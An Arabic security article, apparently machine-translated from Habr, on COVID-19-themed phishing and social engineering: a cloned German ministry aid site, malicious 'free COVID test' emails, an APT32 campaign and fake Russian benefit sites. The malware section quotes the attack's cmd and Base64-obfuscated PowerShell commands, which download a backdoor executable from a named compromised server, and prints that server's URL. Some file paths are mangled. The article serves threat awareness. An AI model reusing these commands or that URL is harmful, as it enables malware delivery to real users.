الهجمات الإلكترونية لفيروس كورونا: بيت القصيد هو في الهندسة الاجتماعية

يواصل المهاجمون استغلال موضوع فيروس كورونا (COVID-19)، مما يخلق المزيد والمزيد من التهديدات للمستخدمين المهتمين بشدة بكل ما يتعلق بالوباء. في أخر نشر لقد تحدثنا بالفعل عن أنواع البرامج الضارة التي ظهرت في أعقاب فيروس كورونا، وسنتحدث اليوم عن تقنيات الهندسة الاجتماعية التي واجهها المستخدمون في بلدان مختلفة، بما في ذلك روسيا. الاتجاهات العامة والأمثلة تحت الخفض.

تذكر في آخر مرة تحدثنا عن حقيقة أن الناس على استعداد للقراءة ليس فقط عن فيروس كورونا ومسار الوباء، ولكن أيضًا عن إجراءات الدعم المالي؟ وهنا مثال جيد. تم اكتشاف هجوم تصيد مثير للاهتمام في ولاية شمال الراين وستفاليا الألمانية أو NRW. قام المهاجمون بإنشاء نسخ من موقع وزارة الاقتصاد (وزارة الشؤون الاقتصادية في NRW)، حيث يمكن لأي شخص التقدم بطلب للحصول على المساعدة المالية. مثل هذا البرنامج موجود بالفعل، واتضح أنه مفيد للمحتالين. بعد تلقي البيانات الشخصية لضحاياهم، قدموا طلبا على موقع الوزارة الحقيقية، لكنهم أشاروا إلى تفاصيل مصرفية أخرى. وبحسب البيانات الرسمية، تم تقديم 4 آلاف طلب وهمي حتى اكتشاف المخطط. ونتيجة لذلك، وقع مبلغ 109 ملايين دولار مخصص للمواطنين المتضررين في أيدي المحتالين.

هل ترغب في إجراء اختبار مجاني لـCOVID-19؟

مثال مهم آخر على التصيد الاحتيالي تحت عنوان فيروس كورونا هو اكتشف في رسائل البريد الإلكتروني. جذبت الرسائل انتباه المستخدمين مع عرض للخضوع لاختبار مجاني للإصابة بفيروس كورونا. في مرفق هذه حروف كانت هناك حالات لـ Trickbot/Qakbot/Qbot. وعندما بدأ الراغبون في التحقق من صحتهم بـ"ملء النموذج المرفق"، تم تنزيل برنامج نصي خبيث على الكمبيوتر. ومن أجل تجنب اختبار وضع الحماية، بدأ البرنامج النصي في تنزيل الفيروس الرئيسي فقط بعد مرور بعض الوقت، عندما اقتنعت أنظمة الحماية بعدم حدوث أي نشاط ضار.

كان من السهل أيضًا إقناع معظم المستخدمين بتمكين وحدات الماكرو. للقيام بذلك، تم استخدام خدعة قياسية: لملء الاستبيان، تحتاج أولا إلى تمكين وحدات الماكرو، مما يعني أنك بحاجة إلى تشغيل البرنامج النصي VBA.

كما ترون، فإن البرنامج النصي VBA مقنع بشكل خاص من برامج مكافحة الفيروسات.

يحتوي Windows على ميزة الانتظار حيث ينتظر التطبيق /T <ثانية> قبل قبول الإجابة الافتراضية "نعم". في حالتنا، انتظر البرنامج النصي 65 ثانية قبل حذف الملفات المؤقتة:

cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt

وأثناء الانتظار، تم تنزيل البرامج الضارة. تم إطلاق برنامج PowerShell النصي الخاص لهذا الغرض:

cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt

بعد فك تشفير قيمة Base64، يقوم البرنامج النصي PowerShell بتنزيل الباب الخلفي الموجود على خادم الويب الذي تم اختراقه مسبقًا من ألمانيا:

http://automatischer-staubsauger.com/feature/777777.png

ويحفظه تحت الاسم :

C:UsersPublictmpdirfile1.exe

ملف ‘C:UsersPublictmpdir’ يتم حذفه عند تشغيل الملف "tmps1.bat" الذي يحتوي على الأمر cmd /c mkdir ""C:UsersPublictmpdir"".

هجوم مستهدف على الجهات الحكومية

بالإضافة إلى ذلك، أبلغ محللو FireEye مؤخرًا عن هجوم مستهدف APT32 استهدف الهياكل الحكومية في ووهان، وكذلك وزارة إدارة الطوارئ الصينية. احتوت إحدى ملفات RTF الموزعة على رابط لمقال نشرته صحيفة نيويورك تايمز بعنوان تحديثات حية لفيروس كورونا: الصين تتعقب المسافرين من هوبي. ومع ذلك، عند قراءته، تم تنزيل برنامج ضار (حدد محللو FireEye المثيل باسم METALJACK).

ومن المثير للاهتمام أنه في وقت الاكتشاف، لم تكتشف أي من برامج مكافحة الفيروسات هذه الحالة، وفقًا لموقع Virustotal.

عندما تكون المواقع الرسمية معطلة

المثال الأكثر وضوحا لهجوم التصيد حدث في روسيا قبل بضعة أيام. وكان السبب في ذلك هو تعيين الاستحقاق الذي طال انتظاره للأطفال الذين تتراوح أعمارهم بين 3 إلى 16 سنة. عندما تم الإعلان عن بدء قبول الطلبات في 12 مايو 2020، هرع الملايين إلى موقع خدمات الدولة للحصول على المساعدة التي طال انتظارها وأسقطوا البوابة ليس أسوأ من هجوم DDoS الاحترافي. وعندما قال الرئيس إن "الخدمات الحكومية لا تستطيع التعامل مع تدفق الطلبات"، بدأ الناس يتحدثون عبر الإنترنت عن إطلاق موقع بديل لقبول الطلبات.

المشكلة هي أن العديد من المواقع بدأت العمل في وقت واحد، وبينما يقبل موقع واحد، وهو الموقع الحقيقي posobie16.gosuslugi.ru، الطلبات فعليًا، المزيد يقوم العشرات بجمع البيانات الشخصية للمستخدمين الساذجين.

اكتشف زملاؤه من SearchInform حوالي 30 نطاقًا احتياليًا جديدًا في منطقة .ru. وتتبعت شركة Infosecurity وSoftline أكثر من 70 موقعًا إلكترونيًا خدميًا حكوميًا مزيفًا مماثلًا منذ بداية أبريل. يتلاعب منشئوها بالرموز المألوفة ويستخدمون أيضًا مجموعات من الكلمات gosuslugi وgosuslugi-16 وvyplaty وcovid-vyplaty وposobie وما إلى ذلك.

الضجيج والهندسة الاجتماعية

كل هذه الأمثلة تؤكد فقط أن المهاجمين ينجحون في تحقيق الدخل من موضوع فيروس كورونا. وكلما زاد التوتر الاجتماعي والقضايا غير الواضحة، زادت فرص المحتالين في سرقة البيانات المهمة، أو إجبار الأشخاص على التخلي عن أموالهم بأنفسهم، أو ببساطة اختراق المزيد من أجهزة الكمبيوتر.

وبالنظر إلى أن الوباء قد أجبر الأشخاص غير المستعدين على العمل من المنزل بشكل جماعي، فإن البيانات الشخصية، ولكن أيضًا بيانات الشركات، معرضة للخطر. على سبيل المثال، تعرض مستخدمو Microsoft 365 (Office 365 سابقًا) مؤخرًا لهجوم تصيد احتيالي. تلقى الأشخاص رسائل صوتية "ضائعة" ضخمة كمرفقات بالرسائل. ومع ذلك، كانت الملفات في الواقع عبارة عن صفحة HTML تم إرسال ضحايا الهجوم إليها صفحة تسجيل دخول وهمية لـ Microsoft 365. ونتيجة لذلك، فقدان الوصول وتسوية جميع البيانات من الحساب.

المصدر: www.habr.com